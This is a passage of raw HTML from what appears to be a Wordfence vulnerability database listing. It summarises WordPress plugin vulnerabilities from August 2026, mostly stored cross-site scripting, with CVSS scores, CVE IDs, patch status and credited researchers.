<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0adad1bc-8803-4c20-ae9f-ab8b66d1e6df" target="_blank" rel="noopener">NotificationX Pro &lt;= 3.1.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78563" target="_blank" rel="noopener noreferrer">							CVE-2026-78563						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/UNKNOWN-CVE-2026-68564" target="_blank" rel="noopener">NotificationX Pro</a> <span class="wfvr-software-slug">[notificationx-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0adad1bc-8803-4c20-ae9f-ab8b66d1e6df" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/714fc209-c872-45e5-9957-0671432cb42f" target="_blank" rel="noopener">Paymob for WooCommerce &lt;= 4.1.10 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66611" target="_blank" rel="noopener noreferrer">							CVE-2026-66611						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paymob-for-woocommerce" target="_blank" rel="noopener">Paymob for WooCommerce</a> <span class="wfvr-software-slug">[paymob-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/714fc209-c872-45e5-9957-0671432cb42f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/725c7fb0-68db-4716-b7a3-150ffe5610ca" target="_blank" rel="noopener">PDF Smart Viewer for Elementor &lt;= 1.0.4 &#8211; Unauthenticated Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-32473" target="_blank" rel="noopener noreferrer">							CVE-2026-32473						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pdf-smart-viewer-for-elementor" target="_blank" rel="noopener">PDF Smart Viewer for Elementor</a> <span class="wfvr-software-slug">[pdf-smart-viewer-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/725c7fb0-68db-4716-b7a3-150ffe5610ca" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/34c2c30e-0ea8-4780-827c-14e9c1b1068b" target="_blank" rel="noopener">Podlove Podcast Publisher &lt;= 4.5.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66615" target="_blank" rel="noopener noreferrer">							CVE-2026-66615						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/podlove-podcasting-plugin-for-wordpress" target="_blank" rel="noopener">Podlove Podcast Publisher</a> <span class="wfvr-software-slug">[podlove-podcasting-plugin-for-wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/34c2c30e-0ea8-4780-827c-14e9c1b1068b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6bc32732-87e8-4891-aa7e-175f8317bfbf" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely &lt;= 7.0.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73190" target="_blank" rel="noopener noreferrer">							CVE-2026-73190						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">Premium Packages – Sell Digital Products Securely</a> <span class="wfvr-software-slug">[wpdm-premium-packages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/evan-nr" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b18e99e14d7f2de268d5197dd1571353.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b18e99e14d7f2de268d5197dd1571353"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/evan-nr" target="_blank" rel="noopener">Evan NR</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6bc32732-87e8-4891-aa7e-175f8317bfbf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a991921e-04cb-4704-8a6a-948fa6be97bf" target="_blank" rel="noopener">Recipe Card Blocks Lite &lt;= 3.4.18 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73361" target="_blank" rel="noopener noreferrer">							CVE-2026-73361						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/recipe-card-blocks-by-wpzoom" target="_blank" rel="noopener">Recipe Card Blocks Lite</a> <span class="wfvr-software-slug">[recipe-card-blocks-by-wpzoom]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a991921e-04cb-4704-8a6a-948fa6be97bf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39242dd0-f968-403e-82f8-2f1d1fccce49" target="_blank" rel="noopener">Royal Addons for Elementor – Addons and Templates Kit for Elementor &lt; 1.7.1066 &#8211; Authenticated (Administrator+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13405" target="_blank" rel="noopener noreferrer">							CVE-2026-13405						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/royal-elementor-addons" target="_blank" rel="noopener">Royal Addons for Elementor – Addons and Templates Kit for Elementor</a> <span class="wfvr-software-slug">[royal-elementor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39242dd0-f968-403e-82f8-2f1d1fccce49" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1458c525-d867-447b-acba-123759789ec8" target="_blank" rel="noopener">Simple File List &lt;= 6.3.11 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16617" target="_blank" rel="noopener noreferrer">							CVE-2026-16617						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-file-list" target="_blank" rel="noopener">Simple File List</a> <span class="wfvr-software-slug">[simple-file-list]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ruwantha-harshamal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ea364d1a9ca481cbc861b1318cc3cc64.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ea364d1a9ca481cbc861b1318cc3cc64"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ruwantha-harshamal" target="_blank" rel="noopener">Ruwantha Harshamal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1458c525-d867-447b-acba-123759789ec8" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9c50e962-30ad-4717-bac2-913b60916307" target="_blank" rel="noopener">SimplyRETS Real Estate IDX &lt;= 3.2.8 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73354" target="_blank" rel="noopener noreferrer">							CVE-2026-73354						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simply-rets" target="_blank" rel="noopener">SimplyRETS Real Estate IDX</a> <span class="wfvr-software-slug">[simply-rets]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/efd10eb3421a6ca0a3d855ad7029a801.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="efd10eb3421a6ca0a3d855ad7029a801"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/v1t" target="_blank" rel="noopener">V1T</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9c50e962-30ad-4717-bac2-913b60916307" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ed34888-ae77-4e48-9c2d-de3202fb2eb7" target="_blank" rel="noopener">SmartSMTP &lt;= 1.2.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66606" target="_blank" rel="noopener noreferrer">							CVE-2026-66606						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-smtp" target="_blank" rel="noopener">SmartSMTP</a> <span class="wfvr-software-slug">[smart-smtp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jorg-steinstrater" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6ab6f7ef1eb693380d3393108f4343f4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6ab6f7ef1eb693380d3393108f4343f4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jorg-steinstrater" target="_blank" rel="noopener">Jorgson</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ed34888-ae77-4e48-9c2d-de3202fb2eb7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/84f129bd-698c-40c2-bd29-e8d0b2a59e1b" target="_blank" rel="noopener">Social Media Share Buttons &amp; Social Sharing Icons &lt;= 2.9.9 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66623" target="_blank" rel="noopener noreferrer">							CVE-2026-66623						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-social-media-icons" target="_blank" rel="noopener">Social Media Share Buttons &amp; Social Sharing Icons</a> <span class="wfvr-software-slug">[ultimate-social-media-icons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/bonds" target="_blank" rel="noopener">Bonds</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/84f129bd-698c-40c2-bd29-e8d0b2a59e1b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/52432f35-c98c-4459-899b-beddf3352834" target="_blank" rel="noopener">Swatchly – Product Variation Swatches for WooCommerce &lt;= 1.4.13 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66605" target="_blank" rel="noopener noreferrer">							CVE-2026-66605						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/swatchly" target="_blank" rel="noopener">Swatchly – Product Variation Swatches for WooCommerce</a> <span class="wfvr-software-slug">[swatchly]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/52432f35-c98c-4459-899b-beddf3352834" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b669fb8c-74a8-44a3-b7fd-6bb17f0eeb7a" target="_blank" rel="noopener">Tagembed: Social Media Feeds and Customer Reviews Widget &lt;= 7.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66590" target="_blank" rel="noopener noreferrer">							CVE-2026-66590						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tagembed-widget" target="_blank" rel="noopener">Tagembed: Social Media Feeds and Customer Reviews Widget</a> <span class="wfvr-software-slug">[tagembed-widget]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b669fb8c-74a8-44a3-b7fd-6bb17f0eeb7a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4fbcd1a5-1518-431a-88af-bf9aebafc0df" target="_blank" rel="noopener">TenWeb Speed Optimizer &lt;= 2.33.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14287" target="_blank" rel="noopener noreferrer">							CVE-2026-14287						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tenweb-speed-optimizer" target="_blank" rel="noopener">10Web Booster – Website speed optimization, Cache &amp; Page Speed optimizer</a> <span class="wfvr-software-slug">[tenweb-speed-optimizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4fbcd1a5-1518-431a-88af-bf9aebafc0df" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
